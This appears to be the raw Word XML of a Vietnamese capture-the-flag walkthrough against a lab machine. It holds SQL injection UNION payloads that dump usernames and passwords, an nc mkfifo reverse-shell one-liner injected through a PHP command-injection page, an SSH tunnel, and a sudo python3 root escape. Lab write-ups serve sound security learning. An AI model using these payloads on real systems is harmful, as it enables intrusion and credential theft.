        </w:rPr>
        <w:t>columns</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE table_</w:t>
      </w:r>
      <w:r w:rsidR="00F726D5">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidR="004E1E59" w:rsidRPr="00E6117A">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidR="00F726D5">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6117A">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>' -- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BFFC56" w14:textId="3113789F" w:rsidR="00CB59B4" w:rsidRPr="00E6117A" w:rsidRDefault="004E1E59" w:rsidP="002C41E3">
      <w:r w:rsidRPr="004E1E59">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B7FA3E2" wp14:editId="19E98406">
            <wp:extent cx="5731510" cy="213741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137410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="54894471" w14:textId="1C70D2A6" w:rsidR="004E1E59" w:rsidRPr="00E6117A" w:rsidRDefault="004E1E59" w:rsidP="004E1E59">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E6117A">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>NULL' UNION ALL SELECT 1,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>id,</w:t>
      </w:r>
      <w:r w:rsidR="00206B68">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6117A">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00C973A3">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00C973A3" w:rsidRPr="00E6117A">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E6117A">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00C973A3" w:rsidRPr="00C973A3">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00206B68">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>pass</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6117A">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">,6 FROM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6117A">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406AE23F" w14:textId="33E9D29B" w:rsidR="00E77907" w:rsidRPr="00314564" w:rsidRDefault="00206B68" w:rsidP="002C41E3">
      <w:r w:rsidRPr="00206B68">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C415755" wp14:editId="1B26E725">
            <wp:extent cx="5731510" cy="207772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077720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="11327BB3" w14:textId="09175D53" w:rsidR="009F0FE7" w:rsidRDefault="00B65A1C" w:rsidP="002C41E3">
      <w:r>
        <w:t>Thử đăng nhập SSH với tài khoản người dùng đã lấy được</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083F55A7" w14:textId="3EB8C635" w:rsidR="009F0FE7" w:rsidRDefault="00EF311F" w:rsidP="002C41E3">
      <w:r w:rsidRPr="00EF311F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22CCB677" wp14:editId="2280B552">
            <wp:extent cx="5425910" cy="5334462"/>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25910" cy="5334462"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5198BAAA" w14:textId="7836D460" w:rsidR="00EF311F" w:rsidRDefault="00EF311F" w:rsidP="002C41E3">
      <w:r>
        <w:t xml:space="preserve">Flag đầu tiên nằm trong user losy </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7E5A0A" w14:textId="1C695933" w:rsidR="00EF311F" w:rsidRDefault="00CA639A" w:rsidP="002C41E3">
      <w:r>
        <w:t xml:space="preserve">Tiếp theo thử sudo -l nhưng có vẻ sudo không được cho phép sử dụng, và cũng không có ứng dụng nào để cho chúng ta khai thác lỗ hổng. Ta sẽ tải lên Linpeas, 1 ứng dụng kiểm tra tự động các lỗ hổng có thể có </w:t>
      </w:r>
      <w:r w:rsidR="00DE0FD8">
        <w:t>giúp ta khai thác và ở đây là</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> leo thang.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636F6E71" w14:textId="14F1F004" w:rsidR="00CA639A" w:rsidRDefault="0062444F" w:rsidP="002C41E3">
      <w:r w:rsidRPr="0062444F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="611B2AED" wp14:editId="20667061">
            <wp:extent cx="5731510" cy="1003935"/>
            <wp:effectExtent l="0" t="0" r="254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003935"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="20917477" w14:textId="48B5CF4D" w:rsidR="0062444F" w:rsidRDefault="0062444F" w:rsidP="002C41E3">
      <w:r>
        <w:t xml:space="preserve">Dựa theo mức độ </w:t>
      </w:r>
      <w:r w:rsidR="00993AFC">
        <w:t xml:space="preserve">nguy hiểm có thể dẫn đến khai thác từ trên xuống dưới, </w:t>
      </w:r>
      <w:r w:rsidR="00830748">
        <w:t xml:space="preserve">sau khi chạy ứng dụng, có 2 </w:t>
      </w:r>
      <w:r w:rsidR="00A17828">
        <w:t xml:space="preserve">điểm cần có thể dẫn tới khai thác được, thứ nhất liên quan đến </w:t>
      </w:r>
      <w:r w:rsidR="00A17828" w:rsidRPr="00A17828">
        <w:t>CVE-2021-3560</w:t>
      </w:r>
      <w:r w:rsidR="00A17828">
        <w:t xml:space="preserve">, một lỗ hổng liên </w:t>
      </w:r>
      <w:r w:rsidR="00EB1656">
        <w:t xml:space="preserve">quan đến 1 dịch vụ hệ thống tên là Polkit, tuy nhiên khi tìm kiếm lại không thấy nó trên </w:t>
      </w:r>
      <w:r w:rsidR="007135EC">
        <w:t>hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DE9BFD" w14:textId="1C9982B9" w:rsidR="007135EC" w:rsidRDefault="007135EC" w:rsidP="002C41E3">
      <w:r>
        <w:t>Điểm thứ 2 chính là trên user losy có một</w:t>
      </w:r>
      <w:r w:rsidR="007C4BE2">
        <w:t xml:space="preserve"> trang PHP đã được chạy trên cổng 9999</w:t>
      </w:r>
      <w:r w:rsidR="007C4BE2" w:rsidRPr="007C4BE2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="673D37C0" wp14:editId="4C1BE06C">
            <wp:extent cx="5731510" cy="97663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976630"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4838A555" w14:textId="7AA0368B" w:rsidR="00A54A10" w:rsidRDefault="00A54A10" w:rsidP="002C41E3">
      <w:r>
        <w:t>Trong SSH có một cờ là -L có thể giúp chúng ta tạo một đường hầm (tunel)</w:t>
      </w:r>
      <w:r w:rsidR="00877D31">
        <w:t xml:space="preserve">, nó sẽ giúp chúng ta đứng trên user jehad có thể truy cập vào localhost:9999 </w:t>
      </w:r>
      <w:r w:rsidR="00E606E1">
        <w:t>với 1 cổng định sẵn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F595DF1" w14:textId="34F4F6AC" w:rsidR="00E606E1" w:rsidRDefault="00E606E1" w:rsidP="002C41E3">
      <w:r>
        <w:t>Câu lệnh như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A7EC31" w14:textId="30748966" w:rsidR="00E606E1" w:rsidRDefault="00E606E1" w:rsidP="002C41E3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E606E1">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh </w:t>
      </w:r>
      <w:hyperlink r:id="rId128" w:history="1">
        <w:r w:rsidRPr="00E606E1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0070C0"/>
          </w:rPr>
          <w:t>jehad@192.168.56.145</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E606E1">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -L 9999:localhost:9999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C7DC95" w14:textId="6FE73463" w:rsidR="00E606E1" w:rsidRDefault="00707E39" w:rsidP="002C41E3">
      <w:r w:rsidRPr="00707E39">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C22EEED" wp14:editId="71589F61">
            <wp:extent cx="5731510" cy="603250"/>
            <wp:effectExtent l="0" t="0" r="254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603250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D1A664" w14:textId="24EED42D" w:rsidR="00707E39" w:rsidRDefault="00707E39" w:rsidP="002C41E3">
      <w:r w:rsidRPr="00707E39">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04075995" wp14:editId="29044C46">
            <wp:extent cx="3223539" cy="23624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23539" cy="2362405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F494C39" w14:textId="77777777" w:rsidR="00F54FC2" w:rsidRDefault="00707E39" w:rsidP="002C41E3">
      <w:r>
        <w:t xml:space="preserve">Từ mã nguồn có được, ta biết được trang web </w:t>
      </w:r>
      <w:r w:rsidR="00693877">
        <w:t xml:space="preserve">có một param là ‘cmd’ với giá trị do người dùng nhập vào, sau đó thực thi nó với </w:t>
      </w:r>
      <w:r w:rsidR="00481C55">
        <w:t>chức</w:t>
      </w:r>
      <w:r w:rsidR="00B3516F">
        <w:t xml:space="preserve"> năng ‘system’ – chức năng cho phép PHP thực thi </w:t>
      </w:r>
      <w:r w:rsidR="00F54FC2">
        <w:t>một lệnh shell. Đây chính là lỗi Command Injection phổ biến</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794E8568" w14:textId="61241AAD" w:rsidR="00707E39" w:rsidRDefault="00B3516F" w:rsidP="002C41E3">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00450052">
        <w:t>Ta thử ls /home/losy xem có gì:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41204A98" w14:textId="1F5774AF" w:rsidR="00450052" w:rsidRDefault="00450052" w:rsidP="002C41E3">
      <w:r w:rsidRPr="00450052">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="352E73A6" wp14:editId="2E7D7DFF">
            <wp:extent cx="5731510" cy="543560"/>
            <wp:effectExtent l="0" t="0" r="254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543560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="79241744" w14:textId="283B15BE" w:rsidR="00450052" w:rsidRDefault="00450052" w:rsidP="002C41E3">
      <w:r>
        <w:t>Vậy flag đầu tiên ở đây:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBDE9D2" w14:textId="56A9E976" w:rsidR="00450052" w:rsidRDefault="00EC23DE" w:rsidP="002C41E3">
      <w:r w:rsidRPr="00EC23DE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D6D637C" wp14:editId="371C605F">
            <wp:extent cx="5731510" cy="6686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668655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6E429C" w14:textId="29137B65" w:rsidR="00EC23DE" w:rsidRDefault="0065115E" w:rsidP="002C41E3">
      <w:r>
        <w:t>Để tiện khai thác, ta sẽ tạo một reverse shell bằng</w:t>
      </w:r>
      <w:r w:rsidR="005C4CF7">
        <w:t xml:space="preserve"> nc trên trang web:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B71A409" w14:textId="2378680C" w:rsidR="005C4CF7" w:rsidRDefault="005C4CF7" w:rsidP="002C41E3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C4CF7">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2&gt;&amp;1|nc 192.168.56.145 7777 &gt;/tmp/f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3C6907" w14:textId="038B37EA" w:rsidR="005C4CF7" w:rsidRDefault="005C4CF7" w:rsidP="002C41E3">
      <w:r>
        <w:t xml:space="preserve">Sau đó đoạn code sẽ được </w:t>
      </w:r>
      <w:r w:rsidR="00025425">
        <w:t>encode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL để chèn </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6895DB" w14:textId="38560C32" w:rsidR="00CF404D" w:rsidRDefault="00CF404D" w:rsidP="002C41E3">
      <w:r w:rsidRPr="00CF404D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1498DD82" wp14:editId="47768E8E">
            <wp:extent cx="3718882" cy="123454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18882" cy="1234547"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="581EAD1C" w14:textId="04F31E87" w:rsidR="00CF404D" w:rsidRDefault="00CF404D" w:rsidP="002C41E3">
      <w:r>
        <w:t xml:space="preserve">Thử kiểm tra quyền sudo của user losy nhưng không </w:t>
      </w:r>
      <w:r w:rsidR="00BF08DE">
        <w:t>có</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE6E513" w14:textId="304488E6" w:rsidR="00BF08DE" w:rsidRDefault="00BF08DE" w:rsidP="002C41E3">
      <w:r w:rsidRPr="00BF08DE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43DCF100" wp14:editId="0090060B">
            <wp:extent cx="5731510" cy="397510"/>
            <wp:effectExtent l="0" t="0" r="254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97510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="50449C2C" w14:textId="6E55DDD5" w:rsidR="00BF08DE" w:rsidRDefault="005511A0" w:rsidP="002C41E3">
      <w:r>
        <w:t>Cũng không có thêm 1 ứng dụng nào có vẻ khả nghi trong thư mục /home/losy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240F97E8" w14:textId="36C3DF44" w:rsidR="005511A0" w:rsidRDefault="009B56DD" w:rsidP="002C41E3">
      <w:r>
        <w:t>Tiếp theo thử in danh sách các mục ẩn của thư mục</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13591470" w14:textId="59A3C6F5" w:rsidR="009B56DD" w:rsidRDefault="009B56DD" w:rsidP="002C41E3">
      <w:r w:rsidRPr="009B56DD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="082F263F" wp14:editId="13DAF55D">
            <wp:extent cx="4305673" cy="20804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05673" cy="2080440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1490D3" w14:textId="323F2887" w:rsidR="003A42AE" w:rsidRDefault="003A42AE" w:rsidP="002C41E3">
      <w:r>
        <w:t xml:space="preserve">.bash_history là một tệp lưu trữ lịch sử các câu lệnh mà người dùng này đã dùng, nhiều lúc sẽ hữu ích khi </w:t>
      </w:r>
      <w:r w:rsidR="00B615B5">
        <w:t>tệp vẫn lưu thông tin quan trọng nào đó</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C029D08" w14:textId="5DE7F953" w:rsidR="00B615B5" w:rsidRDefault="006D6218" w:rsidP="002C41E3">
      <w:r w:rsidRPr="006D6218">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="638D60EE" wp14:editId="41CC83C5">
            <wp:extent cx="2834886" cy="792549"/>
            <wp:effectExtent l="0" t="0" r="381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34886" cy="792549"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2754E069" w14:textId="7F7CC037" w:rsidR="006D6218" w:rsidRDefault="006D6218" w:rsidP="002C41E3">
      <w:r>
        <w:t>Có vẻ như password của user losy là gang.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE6F5DD" w14:textId="71CDF803" w:rsidR="006C60E5" w:rsidRDefault="006C60E5" w:rsidP="002C41E3">
      <w:r w:rsidRPr="006C60E5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CEE4D7B" wp14:editId="1D1F47BE">
            <wp:extent cx="2552921" cy="586791"/>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52921" cy="586791"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B08AEC" w14:textId="54A03B7F" w:rsidR="00A52375" w:rsidRDefault="00A52375" w:rsidP="002C41E3">
      <w:r>
        <w:t>Có trong tay chỗ đứng của user losy, hãy thử kiểm tra quyền sudo trước</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22176A3B" w14:textId="0E0CEC7E" w:rsidR="00A52375" w:rsidRDefault="00A52375" w:rsidP="002C41E3">
      <w:r w:rsidRPr="00A52375">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7538544A" wp14:editId="1DD4F6CE">
            <wp:extent cx="5731510" cy="87884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878840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D96555" w14:textId="5645869F" w:rsidR="00A52375" w:rsidRDefault="00A52375" w:rsidP="002C41E3">
      <w:r>
        <w:t xml:space="preserve">Với python3, ta có thể tạo 1 reverse shell, với </w:t>
      </w:r>
      <w:r w:rsidR="0064000E">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dòng lệnh</w:t>
      </w:r>
      <w:r w:rsidR="0064000E">
        <w:t xml:space="preserve"> duy nhất</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21325AEA" w14:textId="444A52C2" w:rsidR="00A52375" w:rsidRPr="0064000E" w:rsidRDefault="0064000E" w:rsidP="002C41E3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0064000E">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>sudo /usr/bin/python3 -c 'import os; os.system("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7255C3E0" w14:textId="2CCC582A" w:rsidR="0064000E" w:rsidRDefault="00D209AF" w:rsidP="002C41E3">
      <w:r w:rsidRPr="00D209AF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00726B4D" wp14:editId="13AE9D11">
            <wp:extent cx="5731510" cy="145351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453515"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="365F0592" w14:textId="6E22D8E6" w:rsidR="00D209AF" w:rsidRPr="0064000E" w:rsidRDefault="00D209AF" w:rsidP="002C41E3">
      <w:r>
        <w:t>Vậy là flag thứ 2 đã được tìm thấy</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00D209AF" w:rsidRPr="0064000E" w:rsidSect="003566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254E3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="54268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6D15C3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="182EE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C3B84"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DE38C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367595">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="896864522">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1009527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53"/>
    <w:rsid w:val="0000013B"/>
    <w:rsid w:val="000036F4"/>
    <w:rsid w:val="0000565E"/>
    <w:rsid w:val="0000762E"/>
    <w:rsid w:val="000117B6"/>
    <w:rsid w:val="00012786"/>
    <w:rsid w:val="00025425"/>
    <w:rsid w:val="00031367"/>
    <w:rsid w:val="00035B88"/>
    <w:rsid w:val="0003682F"/>
    <w:rsid w:val="000471C5"/>
    <w:rsid w:val="000512EC"/>
    <w:rsid w:val="00054E45"/>
    <w:rsid w:val="000605E1"/>
    <w:rsid w:val="000635C1"/>
    <w:rsid w:val="00075707"/>
    <w:rsid w:val="000763E4"/>
    <w:rsid w:val="0008418B"/>
    <w:rsid w:val="00085506"/>
    <w:rsid w:val="0009506E"/>
    <w:rsid w:val="000B356F"/>
    <w:rsid w:val="000C67C6"/>
    <w:rsid w:val="000D5CF1"/>
    <w:rsid w:val="000E1519"/>
    <w:rsid w:val="000F6DF0"/>
    <w:rsid w:val="00110EF4"/>
    <w:rsid w:val="001322F5"/>
    <w:rsid w:val="00140EE9"/>
    <w:rsid w:val="0015152F"/>
    <w:rsid w:val="001544F1"/>
    <w:rsid w:val="00156625"/>
    <w:rsid w:val="00157B7A"/>
    <w:rsid w:val="00172D4D"/>
    <w:rsid w:val="00180C4F"/>
    <w:rsid w:val="00193F20"/>
    <w:rsid w:val="001A14B7"/>
    <w:rsid w:val="001A6DA0"/>
    <w:rsid w:val="001A73F1"/>
    <w:rsid w:val="001C3691"/>
    <w:rsid w:val="001C6B21"/>
    <w:rsid w:val="001D3F68"/>
    <w:rsid w:val="001E1B64"/>
    <w:rsid w:val="001E1F0B"/>
    <w:rsid w:val="001E59CB"/>
    <w:rsid w:val="002005A2"/>
    <w:rsid w:val="00206B68"/>
    <w:rsid w:val="00207597"/>
    <w:rsid w:val="00210EB4"/>
    <w:rsid w:val="00213239"/>
    <w:rsid w:val="00214F81"/>
    <w:rsid w:val="002160A2"/>
    <w:rsid w:val="00216219"/>
    <w:rsid w:val="00222EF0"/>
    <w:rsid w:val="00247F9F"/>
    <w:rsid w:val="00264AA6"/>
    <w:rsid w:val="00277537"/>
    <w:rsid w:val="00280D1A"/>
    <w:rsid w:val="00292E65"/>
    <w:rsid w:val="00294C56"/>
    <w:rsid w:val="002A594B"/>
    <w:rsid w:val="002C41E3"/>
    <w:rsid w:val="002D630D"/>
    <w:rsid w:val="003102A2"/>
    <w:rsid w:val="00314564"/>
    <w:rsid w:val="003250E6"/>
    <w:rsid w:val="00327AC9"/>
    <w:rsid w:val="00327FBF"/>
    <w:rsid w:val="0033137F"/>
    <w:rsid w:val="00337ED2"/>
    <w:rsid w:val="003409B1"/>
    <w:rsid w:val="0034546A"/>
    <w:rsid w:val="003566FE"/>
    <w:rsid w:val="00362219"/>
    <w:rsid w:val="00376BC8"/>
    <w:rsid w:val="00383024"/>
    <w:rsid w:val="003835EC"/>
    <w:rsid w:val="00387A40"/>
    <w:rsid w:val="003931C3"/>
    <w:rsid w:val="003A2454"/>
    <w:rsid w:val="003A42AE"/>
    <w:rsid w:val="003A7E6A"/>
    <w:rsid w:val="003C2949"/>
    <w:rsid w:val="003C2F5C"/>
    <w:rsid w:val="003D2796"/>
    <w:rsid w:val="003D4CC3"/>
    <w:rsid w:val="003E4A88"/>
    <w:rsid w:val="003F0A89"/>
    <w:rsid w:val="00402961"/>
    <w:rsid w:val="00417465"/>
    <w:rsid w:val="004214E2"/>
    <w:rsid w:val="00421720"/>
    <w:rsid w:val="0042551C"/>
    <w:rsid w:val="004301FA"/>
    <w:rsid w:val="00450052"/>
    <w:rsid w:val="0045713D"/>
    <w:rsid w:val="00457A52"/>
    <w:rsid w:val="00473A68"/>
    <w:rsid w:val="00473CF3"/>
    <w:rsid w:val="00481C55"/>
    <w:rsid w:val="004828C0"/>
    <w:rsid w:val="00497061"/>
    <w:rsid w:val="004A36F0"/>
    <w:rsid w:val="004B27F3"/>
    <w:rsid w:val="004D234C"/>
    <w:rsid w:val="004E1D90"/>
    <w:rsid w:val="004E1E59"/>
    <w:rsid w:val="004E46AD"/>
    <w:rsid w:val="00510BAF"/>
    <w:rsid w:val="005112CA"/>
    <w:rsid w:val="00522F55"/>
    <w:rsid w:val="00536F76"/>
    <w:rsid w:val="005468B8"/>
    <w:rsid w:val="005511A0"/>
    <w:rsid w:val="005515A0"/>
    <w:rsid w:val="00564F12"/>
    <w:rsid w:val="00592788"/>
    <w:rsid w:val="0059456A"/>
    <w:rsid w:val="005B2A82"/>
    <w:rsid w:val="005C4CF7"/>
    <w:rsid w:val="005E243B"/>
    <w:rsid w:val="005E4C36"/>
